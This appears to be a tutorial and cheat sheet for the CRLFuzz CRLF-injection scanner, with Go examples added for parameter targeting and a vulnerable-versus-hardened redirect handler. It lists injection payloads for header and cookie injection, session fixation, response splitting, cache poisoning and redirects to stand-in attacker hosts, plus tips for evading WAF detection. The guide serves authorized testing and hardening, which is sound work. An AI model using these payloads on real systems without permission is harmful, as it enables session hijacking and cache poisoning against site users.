CRLFuzz
Overview
CRLFuzz is a small, fast CRLF (Carriage Return Line Feed) injection scanner written in Go by dwisiswant0. It appends a fixed set of CRLF payloads to each URL you give it, sends the probes concurrently, and reports a URL as vulnerable when the response headers contain the marker header the payload tried to inject. It is a quick first-pass check for bug bounty hunters and penetration testers. Its command line is deliberately minimal, so the sections below stick to the options the tool actually has and say how to get the rest with wrappers and other tools.
Installation
Prerequisites
- A Go toolchain with module support (for go install or building from source)
- Or a precompiled binary from the releases page
go install
go install github.com/dwisiswant0/crlfuzz/cmd/crlfuzz@latest
The binary is placed in $(go env GOPATH)/bin; make sure that directory is on your PATH.
From Source
git clone https://github.com/dwisiswant0/crlfuzz.git
cd crlfuzz
go build -o crlfuzz ./cmd/crlfuzz
The main package lives in cmd/crlfuzz, so a bare go build in the repository root has nothing to build.
macOS/Linux (Binary)
Pick the archive for your OS and architecture from the releases page (substitute the current version for the one shown here):
wget https://github.com/dwisiswant0/crlfuzz/releases/download/v1.5.0/crlfuzz_1.5.0_linux_amd64.tar.gz
tar -xvf crlfuzz_1.5.0_linux_amd64.tar.gz
chmod +x crlfuzz
Compare the archive's checksum with the one published alongside the release before running it.
Homebrew (macOS)
brew install dwisiswant0/tap/crlfuzz
This is not a channel the project itself documents (it documents releases and go install); check that the tap exists before relying on it.
Windows
Download the .exe from the releases page: https://github.com/dwisiswant0/crlfuzz/releases
Basic Usage
| Command | Description |
|---|---|
| crlfuzz -u <url> | Scan a single URL |
| crlfuzz -l <file> | Scan URLs listed in a file, one per line |
| crlfuzz -u <url> -v | Verbose output (prints every probe, not only hits) |
| crlfuzz -l <file> -s | Silent mode: results only, no banner |
| crlfuzz -l <file> -c 50 | Set the concurrency level (default 25) |
| crlfuzz -l <file> -o <file> | Save results to a file |
| crlfuzz -h | Show the help menu |
| crlfuzz -V | Print the version |
crlfuzz also reads URLs from standard input when its input is a pipe (cat urls.txt | crlfuzz), which is how it slots into recon pipelines.
Single URL Scanning
Basic Scan
crlfuzz -u 'http://example.com/?page=test'
Quote the URL so the shell does not interpret & or ?. crlfuzz appends each payload to the end of this string, so the parameter whose value you want tested must come last.
With Verbose Output
crlfuzz -u 'http://example.com/?page=test' -v
Inspect the Actual Requests and Responses
crlfuzz has no --show-req or --show-resp switch. To see exactly what is sent and what comes back, route it through an intercepting proxy and read the traffic there:
crlfuzz -u 'http://example.com/?name=value' -x http://127.0.0.1:8080
Batch Scanning
Scan Multiple URLs from File
crlfuzz -l urls.txt
Create urls.txt (one URL per line, each ending in the parameter you want tested):
http://example.com/?page=test
http://example.com/?user=admin
http://example.com/?id=123
Read URLs from stdin
cat urls.txt | crlfuzz
Scan All URLs with Verbose Mode
crlfuzz -l urls.txt -v
Output Results to File
crlfuzz -l urls.txt -o results.txt
The file receives the vulnerable URLs with the payload already appended, so each line can be replayed directly with curl for confirmation.
Concurrency and Performance
Adjust Concurrency Level
crlfuzz -l urls.txt -c 50
The default is 25 concurrent requests. Each input URL expands into one request per built-in payload, so -c is the number of those probes in flight at a time, not the number of input URLs being scanned.
Maximum Concurrency
crlfuzz -l urls.txt -c 100
Use with care: a high value looks like a flood to rate limiters and WAFs, and the resulting connection errors hide real findings.
Timeout Configuration
crlfuzz has no timeout flag. If a slow target produces errors, lower -c instead, or move slow hosts into a separate, smaller list.
Payload Configuration
Default Payloads
CRLFuzz ships a fixed, compiled-in payload list. Every entry is an encoding of CR and/or LF followed by a marker header (a Set-Cookie) that the scanner then looks for in the response headers. The base encodings are:
%0d%0a (URL-encoded CRLF)
%0d (CR only)
%0a (LF only)
plus further encodings of the same characters (see the payload list in the pkg/crlfuzz package for the exact set). A raw \r\n cannot be sent inside a URL by Go's HTTP client (net/url rejects control characters), so everything on the wire is percent-encoded and it is the target's decoding that produces the real line break.
Custom Payloads
There is no -payloads flag. To run your own payloads, either edit the payload list in pkg/crlfuzz and rebuild from source, or drive the scan from your own Go program through the library (the README has a library example). Keep the marker header in any payload you add, because the verdict is based on finding it in the response headers.
Where the Payload Goes
crlfuzz -u 'http://example.com/?param=test'
There is no VALUE placeholder: crlfuzz appends each payload to the end of the URL you pass, so the injection point is always the tail of the last query parameter (or of the path when there is no query). To test a different parameter, reorder the query so that parameter comes last.
Header Testing
Add Custom Headers
crlfuzz -u 'http://example.com/' -H 'X-Forwarded-For: test' -v
-H sets a static request header (session cookies, API tokens, a realistic User-Agent). It is sent unchanged with every probe.
Multiple Custom Headers
crlfuzz -u 'http://example.com/' -H 'User-Agent: test' -H 'X-Custom: value'
Fuzzing Request Headers
crlfuzz does not inject into request headers (there is no --test-headers), and a CR or LF placed directly into an -H value is refused by Go's HTTP client as an invalid header field value. Reflected request headers such as X-Forwarded-Host are still worth testing for CRLF injection, but with a tool that sends raw requests (an intercepting proxy's repeater, or a hand-built request over a socket).
Parameter Fuzzing
Scan All Parameters
crlfuzz -u 'http://example.com/?page=test&user=admin&id=123'
This does not test every parameter: the payload is appended to the URL, so only the last parameter (id) receives it. To cover page and user as well, give crlfuzz one URL per parameter, each reordered so the parameter under test is last:
http://example.com/?user=admin&id=123&page=test
http://example.com/?page=test&id=123&user=admin
http://example.com/?page=test&user=admin&id=123
Focus on Specific Parameter
crlfuzz -u 'http://example.com/?id=123&page=test'
There is no -param flag; put the parameter you care about at the end of the query string.
Exclude Parameters from Testing
There is no -skip flag either. Leave the parameter out of the URL list you generate, or keep it in the query but never in the last position.
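The per-parameter reordering described above, as an added Go example (this is not code from the page or from the crlfuzz project). It assumes, as stated above, that crlfuzz appends its payload to the end of the URL; the payload constant is a constructed illustration in the shape of the page's defaults, not crlfuzz's actual list. Run it with URLs as arguments and pipe the output into crlfuzz, or save it and pass the file to crlfuzz -l.

```go
package main

import (
	"fmt"
	"net/url"
	"os"
	"strings"
)

// examplePayload is a constructed marker payload in the shape of the page's
// defaults; it stands in for crlfuzz's compiled-in list (assumption).
const examplePayload = "%0d%0aSet-Cookie:crlfuzz=crlfuzz"

// ParamTargets returns one URL per query parameter, with that parameter moved
// to the end of the query string while the others keep their order. Because
// the scanner appends its payload to the URL, each returned URL puts the
// payload into a different parameter's value. A URL without a query is
// returned unchanged, so the payload lands on the path.
func ParamTargets(raw string) ([]string, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return nil, err
	}
	var pairs []string
	for _, p := range strings.Split(u.RawQuery, "&") {
		if p != "" { // drop empty segments from "a=1&&b=2" or a trailing "&"
			pairs = append(pairs, p)
		}
	}
	if len(pairs) == 0 {
		return []string{raw}, nil
	}
	out := make([]string, 0, len(pairs))
	for i := range pairs {
		reordered := make([]string, 0, len(pairs))
		for j, p := range pairs {
			if j != i {
				reordered = append(reordered, p)
			}
		}
		reordered = append(reordered, pairs[i])
		v := *u // shallow copy; only RawQuery changes
		v.RawQuery = strings.Join(reordered, "&")
		out = append(out, v.String())
	}
	return out, nil
}

// WithPayload shows the exact string that reaches the target for a given
// target URL: the scanner's injection point is simply the tail of the URL.
func WithPayload(target, payload string) string {
	return target + payload
}

func main() {
	if len(os.Args) < 2 {
		fmt.Fprintln(os.Stderr, "usage: paramtargets URL [URL...]   (pipe the output into crlfuzz)")
		os.Exit(2)
	}
	for _, raw := range os.Args[1:] {
		targets, err := ParamTargets(raw)
		if err != nil {
			fmt.Fprintf(os.Stderr, "skip %q: %v\n", raw, err)
			continue
		}
		for _, t := range targets {
			fmt.Println(t)
		}
	}
}
```

The original order of the remaining parameters is kept on purpose: some applications behave differently when parameters are reordered, and changing only the position of the one under test keeps the probe as close as possible to the real request.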
Output Formats
Default Text Output
crlfuzz -u 'http://example.com/?test=value'
Output is one line per vulnerable probe: the full URL with the payload appended (the exact line prefix and colouring depend on the version). The tested parameter is whatever sits at the end of that URL; there is no separate parameter, payload or status-code field.
JSON and CSV
crlfuzz has no -json or -csv switch. Its output is already one URL per line, so write it with -o and convert it with a small script if a downstream tool needs JSON or CSV.
Silent Mode
crlfuzz -l urls.txt -s
Silent mode suppresses the banner and prints results only, which is what you want when piping into another tool.
Proxy Configuration
HTTP Proxy
crlfuzz -u 'http://example.com/?test=value' -x http://127.0.0.1:8080
The flag is -x/--proxy and takes a proxy URL. Pointing it at Burp or ZAP is also the easiest way to see the exact probes and responses.
SOCKS5 Proxy
crlfuzz -u 'http://example.com/?test=value' -x socks5://127.0.0.1:1080
Go's standard HTTP client accepts socks5:// proxy URLs, so this works as long as crlfuzz passes the value straight through; confirm by watching the proxy's connection log.
Proxy with Authentication
crlfuzz -u 'http://example.com/?test=value' -x http://user:pass@127.0.0.1:8080
Credentials in the URL end up in shell history and process listings; prefer an unauthenticated listener on localhost.
SSL/TLS Options
crlfuzz has no --insecure or --ca-cert flag. When the target's certificate is not trusted by the system store:
- Add the CA to the system trust store, or point Go's TLS stack at it with SSL_CERT_FILE=/path/to/ca.crt in the environment (honoured by Go programs on Linux).
- Route the scan through an intercepting proxy with -x; the proxy then handles TLS to the target.
crlfuzz -u 'https://example.com/?test=value' -x http://127.0.0.1:8080
Check whether the version you run already skips certificate verification (many scanners do). If it does, a man-in-the-middle between you and the target can feed you fabricated results.
HTTP Methods and Request Customization
Test with POST
crlfuzz -u 'http://example.com/' -X POST -d 'param=value&user=test'
The flags are -X/--method and -d/--data. The body is sent as given; the CRLF payload is still appended to the URL, so what you are testing is whether a URL parameter is reflected into the response headers of the POST handler. Body parameters are not fuzzed.
PUT Request
crlfuzz -u 'http://example.com/api/resource' -X PUT -d 'field=value'
JSON Body
crlfuzz -u 'http://example.com/api' -X POST -d '{"key":"value"}' -H 'Content-Type: application/json'
Add Request Headers
crlfuzz -u 'http://example.com/?test=value' -H 'Authorization: Bearer <token>' -H 'Content-Type: application/json'
Response Analysis
crlfuzz does not print response headers or bodies (there is no --show-resp, --show-body or --filter-status). Its only analysis is whether the marker header made it into the response. For everything else, capture the traffic:
Via an Intercepting Proxy
crlfuzz -u 'http://example.com/?test=value' -x http://127.0.0.1:8080
Confirm a Hit by Hand
Take a reported URL from the output and replay it with curl -i against the target. The injected Set-Cookie line in the response headers, or a status line that changes with the payload, confirms the finding. Filter the input list by status code before the scan (for example with httpx -mc 200), not during it.
Advanced Filtering
There is no -match flag. crlfuzz's built-in criterion is already a match on the response headers (the injected marker cookie). If you need a different criterion, such as an injected Location header, collect the hits and replay them:
crlfuzz -l urls.txt -s -o hits.txt
Replay every line in hits.txt with curl -i and keep those whose response headers contain Location:. A match on a header name alone is weak evidence; check that the value is the one you injected and not one the application sets anyway.
Rate Limiting
crlfuzz has no -delay or -rate flag; the only throttle is concurrency.
Lowest Request Rate
crlfuzz -l urls.txt -c 1
One probe in flight at a time. For a fixed pause between batches, split the URL list into small files and run crlfuzz on each with a sleep in between; for a hard requests-per-second cap, send the traffic through a proxy that enforces one.
Common Workflows
Quick Vulnerability Scan
crlfuzz -u 'http://example.com/?user=test&page=home'
Comprehensive Bug Bounty Scan
crlfuzz -l target-urls.txt -v -x http://127.0.0.1:8080 -o findings.txt
Verbose output plus a proxy capture gives you the raw request and response for the report.
Low-Noise Scanning
crlfuzz -l urls.txt -c 2 -H 'User-Agent: Mozilla/5.0'
Large-Scale Assessment
crlfuzz -l thousands-of-urls.txt -c 50 -s -o results.txt
CRLF Injection Attack Vectors
Every vector relies on the same primitive: a decoded CR LF inside a value that the server writes into a response header terminates that header, and the text after it is parsed by the client as a new header line (or, after a blank line, as the body).
Header Injection
Payload: %0d%0aSet-Cookie:admin=true
Result: the response carries an attacker-chosen Set-Cookie header
Response Splitting
Payload: %0d%0a%0d%0aHTTP/1.1 200 OK
Result: the second CR LF pair ends the header block, so everything after it is treated as body (or, by a client or cache that reads the stream loosely, as a second response); with a matching Content-Length the attacker controls the page content
Session Fixation
Payload: %0d%0aSet-Cookie:SESSIONID=attacker-controlled
Result: the victim's browser adopts a session identifier the attacker already knows
Open Redirect via Headers
Payload: %0d%0aLocation:http://evil.com
Result: the browser follows the injected Location to the attacker's site (requires a 3xx status, or a client that honours Location regardless)
Cache Poisoning
Payload: any of the above, sent to a URL that an intermediary cache will store
Result: every later visitor to that URL receives the tampered response; whether the cache stores it depends on its cache key and Cache-Control handling, so verify against the real edge rather than the origin
Understanding CRLFuzz Output
Example Output
A hit is printed as the probed URL, payload included, for example (a constructed illustration; the line prefix and colours depend on the version):
http://example.com/?page=test%0d%0aSet-Cookie:crlfuzz=crlfuzz
There is no separate parameter, payload or status field: the parameter is the last one in the URL and the payload is its tail. With -v, probes that did not trigger are printed too, so you can tell "not vulnerable" from "request failed".
Vulnerability Indicators
crlfuzz's verdict rests on one indicator: the marker header from the payload appears in the response headers. When you confirm a hit manually, also look for:
- A header in the response that you did not send and the application does not normally set
- A status line or body that changes with the payload (evidence of splitting)
- The injected cookie actually being stored by a real browser, which proves client-side impact
- The behaviour surviving a different encoding of the CR LF, which rules out a fluke
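The "Open Redirect via Headers" vector above and the header-level verdict described under Vulnerability Indicators, as an added Go example (this is not code from the page or from the crlfuzz project). It models a handler that writes a decoded parameter straight into a Location header, the hardened form beside it, and the check a CRLF scanner's verdict rests on: parse the raw response as a client would and look for the marker cookie. The marker name and value are assumptions, and the two handlers are constructed for illustration.

```go
package main

import (
	"bufio"
	"fmt"
	"net/http"
	"net/url"
	"strings"
)

// Constructed probe in the shape of the page's default payloads: a
// percent-encoded CR LF followed by a marker header. The marker name and
// value are an assumption for illustration, not crlfuzz's exact built-in list.
const (
	markerName  = "crlfuzz"
	markerValue = "crlfuzz"
	probe       = "%0d%0aSet-Cookie:" + markerName + "=" + markerValue
)

// ResponseBuilder models a server that turns a query value into a redirect.
type ResponseBuilder func(decodedTarget string) string

// VulnerableRedirect concatenates the decoded value straight into the
// Location header, so a CR LF inside it starts a new header line.
func VulnerableRedirect(target string) string {
	return "HTTP/1.1 302 Found\r\nLocation: " + target + "\r\nContent-Length: 0\r\n\r\n"
}

// HardenedRedirect removes CR and LF before the value reaches the header
// (a framework's header API would normally reject or strip them; this
// handler builds raw bytes by assumption, to show the difference).
func HardenedRedirect(target string) string {
	clean := strings.NewReplacer("\r", "", "\n", "").Replace(target)
	return "HTTP/1.1 302 Found\r\nLocation: " + clean + "\r\nContent-Length: 0\r\n\r\n"
}

// HasInjectedCookie parses the raw response bytes the way a client would and
// reports whether a Set-Cookie carrying the marker is present. The marker can
// only show up if the injected line became a real header, which is why a
// scanner can trust this check more than reflection somewhere in the body.
func HasInjectedCookie(raw string) (bool, error) {
	resp, err := http.ReadResponse(bufio.NewReader(strings.NewReader(raw)), nil)
	if err != nil {
		return false, err
	}
	defer resp.Body.Close()
	for _, c := range resp.Cookies() {
		if c.Name == markerName && c.Value == markerValue {
			return true, nil
		}
	}
	return false, nil
}

// Probe appends the payload to the parameter value, decodes it the way a
// server's query parser would, runs the handler and checks the result.
func Probe(build ResponseBuilder, value string) (bool, error) {
	decoded, err := url.QueryUnescape(value + probe)
	if err != nil {
		return false, err
	}
	return HasInjectedCookie(build(decoded))
}

func main() {
	handlers := map[string]ResponseBuilder{
		"vulnerable": VulnerableRedirect,
		"hardened":   HardenedRedirect,
	}
	for name, build := range handlers {
		injected, err := Probe(build, "/home")
		fmt.Printf("%-10s injected=%v err=%v\n", name, injected, err)
	}
}
```

Running it reports injected=true for the vulnerable builder and injected=false for the hardened one. Note that the hardened version only removes the line break; the value still contains the text "Set-Cookie:...", which is harmless inside a single header but a reminder that stripping is a last line of defence and the real fix is a header API that refuses control characters.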
Detection Evasion
crlfuzz has no randomisation or evasion features. What you can control:
Set a Realistic User-Agent
crlfuzz -u 'http://example.com/?test=value' -H 'User-Agent: Mozilla/5.0'
The value is fixed for the whole run; to vary it, run several smaller scans with different headers.
Slow Down
crlfuzz -l urls.txt -c 3
Encoding Variants
The built-in payload list already covers several encodings of CR and LF; a filter that blocks %0d%0a may let another encoding through, which is why crlfuzz sends them all. Do not rely on scanner evasion for a real assessment: if a WAF blocks the probes, record that in the report rather than treating the target as clean.
Troubleshooting
Connection Timeouts
crlfuzz -l urls.txt -c 5
There is no -t flag. Lower the concurrency, and scan slow hosts in a separate, smaller list.
Too Many Errors
crlfuzz -l urls.txt -c 2 -v
Verbose mode shows which probes fail. A wall of errors usually means a rate limit or WAF rather than a tool problem; confirm by replaying one probe with curl.
SSL Certificate Issues
crlfuzz -u 'https://example.com/?test=value' -x http://127.0.0.1:8080
There is no --insecure flag. Route the scan through a proxy you control, or add the CA to the trust store (SSL_CERT_FILE on Linux).
Not Finding Vulnerabilities
crlfuzz -u 'http://example.com/?test=value' -v
First check that the parameter you mean to test is last in the URL, because that is where the payload lands. Then check with -v that probes reach the target without errors, and replay one probe by hand to see whether a filter strips or rejects CR and LF. A clean result only says the marker header did not come back: reflection into the response body alone is not reported, because it is not header injection.
Best Practices
- Obtain written authorization before scanning production systems
- Start with low concurrency and increase gradually
- Put the parameter under test at the end of the URL; generate one URL per parameter for full coverage
- Confirm every hit by replaying the reported URL and reading the raw response headers
- Combine with other scanners and manual testing; crlfuzz covers URL-based header injection only
- Keep the tool updated, since the payload list is compiled in
Payload Examples
Each payload is percent-encoded so it survives transport in the URL; the target's decoding produces the real CR LF.
Basic CRLF
%0d%0a
Header Injection
%0d%0aX-Injected-Header:value
Cookie Injection
%0d%0aSet-Cookie:name=value
Location Redirect
%0d%0aLocation:http://attacker.com
crlfuzz only runs its compiled-in list; use these when confirming a finding by hand with curl or a proxy repeater.
Integration with Other Tools
crlfuzz reads URLs from standard input when its input is a pipe, so it slots into the usual recon pipelines.
Pipe Live Hosts from httpx
httpx -l domains.txt -silent | crlfuzz
With Wayback Machine URLs
waybackurls example.com | grep '=' | crlfuzz -s
Keeping only URLs that contain a query string focuses the scan on inputs where a parameter value sits at the end of the URL.
Parameter Discovery First
A parameter brute-forcer such as ffuf reports hits in its own format rather than as URLs, so do not pipe it straight into crlfuzz. Take the discovered parameter names, build one URL per candidate with that parameter last, and feed the list to crlfuzz -l.
Performance Tips
- Raise -c for large URL lists, but watch for the error rate climbing with it
- Deduplicate the input first (sort -u) so the same URL is not probed repeatedly
- Scan slow hosts in a separate list rather than letting them hold back the rest
- Monitor network usage; the payload list multiplies every input URL
- Use -s when piping output so the banner does not end up in the next tool
Legal Considerations
CRLFuzz is for authorized security testing only. Obtain explicit written permission before testing any system; unauthorized scanning and access are illegal in most jurisdictions.
Resources
- GitHub: https://github.com/dwisiswant0/crlfuzz
- CRLF Injection overview: https://owasp.org/ (search for "CRLF Injection" and "HTTP Response Splitting")
- Bug bounty platforms: https://hackerone.com/
- Community: the project's GitHub issues and discussions